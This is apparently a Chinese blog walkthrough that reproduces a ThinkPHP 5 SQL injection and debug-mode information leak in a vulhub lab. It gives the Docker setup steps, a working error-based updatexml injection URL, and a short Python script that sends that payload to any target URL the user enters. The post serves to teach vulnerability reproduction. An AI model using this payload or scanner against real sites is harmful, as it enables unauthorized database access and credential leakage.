ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞

1 漏洞介绍

ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码

2 漏洞环境

复制代码
cd vulhub/thinkphp/in-sqlinjection/
部署环境
docker compose up -d
查看端口
docker compose ps

访问 ,您将看到显示用户名,表示环境正在成功运行。

http://192.168.135.132/index.php?ids[]=1&ids[]=2

3 使用payload进行复现

打开页面,你会发现消息显示成功:

http://192.168.135.132/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

4 编写python脚本探测漏洞

复制代码
#!/usr/bin/env python
​
import requests
from urllib.parse import urljoin
​
def thinkphp5x_sql(url):
    payload = urljoin(url, '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1')
​
    response = requests.get(url=payload, verify=False)
​
    if 'XPATH syntax error' in response.text:
        print("漏洞存在")
    else:
        print("漏洞不存在")
​
if __name__ == '__main__':
    print("注意:本代码仅用于实验和学习目的,请谨慎使用。")
    url = input("请输入目标 URL: ")
    thinkphp5x_sql(url)

结果

相关推荐
曼岛_31 分钟前
[网络安全] Linux权限维持-隐藏篇
linux·安全·web安全·安全威胁分析
JS_SWKJ1 小时前
攻防升级下,网闸与光闸的创新突围——2026年网络安全隔离行业新趋势及产品实践
网络·安全·web安全
亚马逊云开发者1 小时前
Claude Mythos Preview 来了:Anthropic 网络安全专用大模型在 Amazon Bedrock 上开放申请,代码审计要变天了
安全·web安全·状态模式
数字哨兵(和中)1 小时前
9.8 分高危漏洞复现:CVE-2026-27944 Nginx UI 信息泄露漏洞
安全·web安全
Chockmans18 小时前
春秋云境CVE-2019-9618
安全·web安全·网络安全·系统安全·网络攻击模型·春秋云境·cve-2019-9618
酿情师18 小时前
Shiro 反序列化漏洞原理(小白零基础详解)
java·web安全·网络安全
wanhengidc18 小时前
流量清洗的作用是什么?
运维·服务器·网络·安全·web安全·智能手机
一名优秀的码农20 小时前
vulhub系列-46-dGears of War: EP#1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
jerryinwuhan20 小时前
网络安全相关制度
网络·安全·web安全
zjeweler20 小时前
“网安+护网”终极300多问题面试笔记-1共3-内网&域相关
笔记·web安全·网络安全·面试·职场和发展·护网面试